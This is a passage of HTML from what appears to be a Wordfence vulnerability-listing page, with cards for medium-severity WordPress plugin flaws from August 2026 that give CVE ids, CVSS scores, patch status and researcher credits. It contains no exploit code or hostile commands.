<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/catfolders-document-gallery-pro" target="_blank" rel="noopener">Catfolders Document Gallery Pro</a> <span class="wfvr-software-slug">[catfolders-document-gallery-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4978261d-0ec8-42de-af50-f02032689595" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/587e8fb5-6f89-45ee-959c-78f323b157b5" target="_blank" rel="noopener">CMP – Coming Soon &amp; Maintenance Plugin by NiteoThemes &lt; 4.1.18 &#8211; Missing Authorization to Unauthenticated Settings Change</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13414" target="_blank" rel="noopener noreferrer">							CVE-2026-13414						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance" target="_blank" rel="noopener">CMP – Coming Soon &amp; Maintenance Plugin by NiteoThemes</a> <span class="wfvr-software-slug">[cmp-coming-soon-maintenance]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/587e8fb5-6f89-45ee-959c-78f323b157b5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/72463469-5069-446d-bd83-d31598422cb2" target="_blank" rel="noopener">Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy &lt; 5.0.14 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16575" target="_blank" rel="noopener noreferrer">							CVE-2026-16575						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-lite" target="_blank" rel="noopener">Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy</a> <span class="wfvr-software-slug">[dokan-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/72463469-5069-446d-bd83-d31598422cb2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a151c680-2bcf-4b36-aa6e-9694c6d3d0c7" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets &lt;= 6.8.0 &#8211; Unauthenticated Captcha Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81777" target="_blank" rel="noopener noreferrer">							CVE-2026-81777						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-addons-for-elementor-lite" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets</a> <span class="wfvr-software-slug">[essential-addons-for-elementor-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/gaurav-popalghat" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3de24b42a136b2de55a6032099259119.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3de24b42a136b2de55a6032099259119"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/gaurav-popalghat" target="_blank" rel="noopener">Gaurav popalghat</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a151c680-2bcf-4b36-aa6e-9694c6d3d0c7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d8c07de1-b722-4252-a5a3-52b12dae72dc" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce &lt; 4.1.19 &#8211; Unauthenticated Order Completion</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77694" target="_blank" rel="noopener noreferrer">							CVE-2026-77694						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nir-yehoshua" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9786d2004e23d165ca5600a93fa2c533.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9786d2004e23d165ca5600a93fa2c533"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nir-yehoshua" target="_blank" rel="noopener">Nir Yehoshua</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d8c07de1-b722-4252-a5a3-52b12dae72dc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ccb16c9-7a04-4c8f-9eaa-7efbd84991b3" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce &lt; 4.1.22 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13172" target="_blank" rel="noopener noreferrer">							CVE-2026-13172						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ccb16c9-7a04-4c8f-9eaa-7efbd84991b3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0e52475e-2a04-4973-b419-fb477fe872e5" target="_blank" rel="noopener">Events Manager &lt;= 7.4.0 &#8211; Missing Authorization to Unauthenticated Sensitive Information Disclosure via &#8216;status&#8217;, &#8216;private&#8217;, and &#8216;private_only&#8217; Parameters</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-10627" target="_blank" rel="noopener noreferrer">							CVE-2026-10627						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-manager" target="_blank" rel="noopener">Events Manager – Calendar, Bookings, Tickets, and more!</a> <span class="wfvr-software-slug">[events-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/molten-bit" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/509a0254bc50b96d0436a094a1160af3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="509a0254bc50b96d0436a094a1160af3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/molten-bit" target="_blank" rel="noopener">molten bit</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0e52475e-2a04-4973-b419-fb477fe872e5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c5bbf7ed-c154-4153-adbf-59f0f7aa3a18" target="_blank" rel="noopener">Everest Forms &lt;= 3.4.4 &#8211; Unauthenticated Server-Side Request Forgery via Upload Field &#8216;Previous Value&#8217;</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5096" target="_blank" rel="noopener noreferrer">							CVE-2026-5096						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/everest-forms" target="_blank" rel="noopener">Everest Forms – Contact Form, Payment Form, Quiz, Survey &amp; Custom Form Builder with AI</a> <span class="wfvr-software-slug">[everest-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c5bbf7ed-c154-4153-adbf-59f0f7aa3a18" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b7bb2a2-60b2-49c2-9fba-d8ea17a00617" target="_blank" rel="noopener">FiboSearch – Ajax Search for WooCommerce &lt; 1.34.1 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16612" target="_blank" rel="noopener noreferrer">							CVE-2026-16612						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ajax-search-for-woocommerce" target="_blank" rel="noopener">FiboSearch – Ajax Search for WooCommerce</a> <span class="wfvr-software-slug">[ajax-search-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duy-khanh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2cd055dd6c3bc3b1292e85a8a8a0cfd9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2cd055dd6c3bc3b1292e85a8a8a0cfd9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duy-khanh" target="_blank" rel="noopener">Duy Tran</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b7bb2a2-60b2-49c2-9fba-d8ea17a00617" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2b162b37-c28e-452c-a1e6-0d08341f81ac" target="_blank" rel="noopener">Fluent Forms Pro Add On Pack &lt;= 6.2.12 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81296" target="_blank" rel="noopener noreferrer">							CVE-2026-81296						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentformpro" target="_blank" rel="noopener">Fluent Forms Pro Add On Pack</a> <span class="wfvr-software-slug">[fluentformpro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2b162b37-c28e-452c-a1e6-0d08341f81ac" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/906e73a2-c05c-4a5e-b111-df3c1b05f8a5" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder &lt;= 1.57.1 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82220" target="_blank" rel="noopener noreferrer">							CVE-2026-82220						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ahmed-hassan-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/13e4fb57452a5afebd2ab91bf8a0bd52.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="13e4fb57452a5afebd2ab91bf8a0bd52"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ahmed-hassan-2" target="_blank" rel="noopener">Ahmed Hassan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/906e73a2-c05c-4a5e-b111-df3c1b05f8a5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/46f1c52b-8b82-4ea7-8c24-37c27b3e0a27" target="_blank" rel="noopener">HEL Online Classroom: AI-powered Online Classrooms &lt;= 1.0.3 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77007" target="_blank" rel="noopener noreferrer">							CVE-2026-77007						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hel-online-classroom" target="_blank" rel="noopener">HEL Online Classroom: AI-powered Online Classrooms</a> <span class="wfvr-software-slug">[hel-online-classroom]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kimsunghoon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2bbb850fa7caee630973169f68ae8160.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2bbb850fa7caee630973169f68ae8160"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kimsunghoon" target="_blank" rel="noopener">kimsunghoon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/46f1c52b-8b82-4ea7-8c24-37c27b3e0a27" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/88223f4a-f879-41fe-85bf-a14501462aca" target="_blank" rel="noopener">Kali Forms — Contact Form &amp; Drag-and-Drop Builder &lt;= 2.4.23 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81276" target="_blank" rel="noopener noreferrer">							CVE-2026-81276						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">Kali Forms — Contact Form &amp; Drag-and-Drop Builder</a> <span class="wfvr-software-slug">[kali-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3dd75d22cf7caf7fb02d4911f1dbfa51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3dd75d22cf7caf7fb02d4911f1dbfa51"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener">sungbyeongchan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/88223f4a-f879-41fe-85bf-a14501462aca" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/537b44d4-c227-4241-9ffe-b83177b4225b" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer &lt; 6.0.14 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77754" target="_blank" rel="noopener noreferrer">							CVE-2026-77754						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/537b44d4-c227-4241-9ffe-b83177b4225b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/05e1d30e-441b-44e2-a89b-eba905384673" target="_blank" rel="noopener">KiviCare – Clinic &amp; Patient Management System (EHR) &lt;= 4.5.4 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
